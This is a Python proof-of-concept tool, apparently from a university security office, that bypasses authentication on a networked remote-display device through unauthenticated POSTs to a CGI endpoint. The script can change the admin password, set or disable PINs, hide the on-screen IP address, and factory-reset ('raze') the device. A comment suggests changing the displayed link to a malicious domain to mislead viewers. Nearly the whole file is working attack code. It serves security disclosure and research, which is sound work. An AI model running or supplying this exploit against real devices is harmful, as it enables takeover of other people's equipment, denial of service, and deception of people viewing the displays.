#!/usr/bin/env python ## POC remote display authentication bypass tool ## Carnegie Mellon Univeristy ## Information Security Office ## Author: Brian W. Gray ## Initial Creation Date: 07.02.2014 ## Last updated: 07.07.2014 version="%prog 0.03a" import urllib import urllib2 try: import xml.etree.cElementTree as ET # Load cElemenTree for performance gain except ImportError: import xml.etree.ElementTree as ET # Fail back to ElementTree if cElementTree is not available from optparse import OptionParser usage = "usage: %prog -i [address] -a [action] -o [option input]" parser = OptionParser(usage=usage, version=version) parser.add_option("-i", "--ip", dest="selHost", help="Provide the device address [192.168.100.10]", metavar="value") parser.add_option("-a", "--action", dest="selAction", help="Select an action [password, pin, setpin, showip, setlink, status, factoryreset]", metavar="value") parser.add_option("-o", "--option", dest="selOption", help="Provide an option to the Action [password [yourPassword], pin [enable / disable], setpin [0000], showip [enable / disable], setlink [hostname], status [query], factoryreset [raze]]", metavar="value") (options, args) = parser.parse_args() if not options.selHost: parser.error('A device address was not provided. Use -h for help') if not options.selAction: parser.error('An action selection was not provided. Use -h for help') if not options.selOption: parser.error('An option was not provided. Use -h for help') selHost = options.selHost selAction = options.selAction selOption = options.selOption optionValue = "0" # Set device return_test.cgi URI. url = 'http://' + selHost + '/cgi-bin/return_test.cgi' # Set a new password if selAction == "password": buildCommand = "Pwd_admin"+selOption+"" # Enable or Disable pins elif selAction == "pin": if selOption == "enable": optionValue = "1" elif selOption == "disable": optionValue = "0" else: print('\r\nYou have provided an Unknown option for configuring pins options are enable or disable defaulting to disable') optionValue = "0" buildCommand = "LoginCodeType"+optionValue+"" # Set a static pin for the on screen display. elif selAction == "setpin": if int(selOption) >= 0 and int(selOption) < 10000 : print ('\r\nSetting pin to ' + selOption) else: print('\r\nYou have provided an invalid option and the pin has defaulted to 0000') selOption = "0000" buildCommand = "LoginCodeType2videooutput4Resolution4LOGIN"+selOption+"UNDER_SCAN0UNDER_SCX00UNDER_SCY00UNDER_SCX165535UNDER_SCY165535" # Enable or Disable the on screen display of the ip address. elif selAction == "showip": if selOption == "enable": optionValue = "1" elif selOption == "disable": optionValue = "0" else: print('\r\nYou have provided an Unknown option for showip options are enable or disable defaulting to disable') optionValue = "0" buildCommand = "OSDIPOnOff"+optionValue+"" # Rename the host to display a custom link on screen. ex. (-a setlink -o malicious.collectingyour.info) Combine with (-a showip -o disable) actions. elif selAction == "setlink": buildCommand = "DOMAIN_NAME"+selOption+"WL_ESSID"+selOption+"ControlSystemId5" # Query device status for debugging. elif selAction == "status": if selOption == "query": buildCommand = "" else: print('\r\n -o query is being assumed to request device status') selOption = query # Reset the device to factory defaults. elif selAction == "factoryreset": if selOption == "raze": buildCommand = "r99" else: print('\r\nYou must supply -o raze to reset this device to factory settings') exit() else: print('\r\nYou have selected an Unknown Action') exit() # Build and send HTML POST values = {} values['command'] = buildCommand data = urllib.urlencode(values) headers = { 'User-Agent' : 'User-Agent: CMU/2.2 CFNetwork/672.0.8 Darwin/14.0.0' } req = urllib2.Request(url, data, headers) response = urllib2.urlopen(req) html = response.read() # Parse and display Boa response root = ET.fromstring(html) print ("\r\nBoa service response: \r\n") # for node in root.findall(".//*"): for node in root.iter(): print node.tag, ":", node.text print ("\r\n") exit()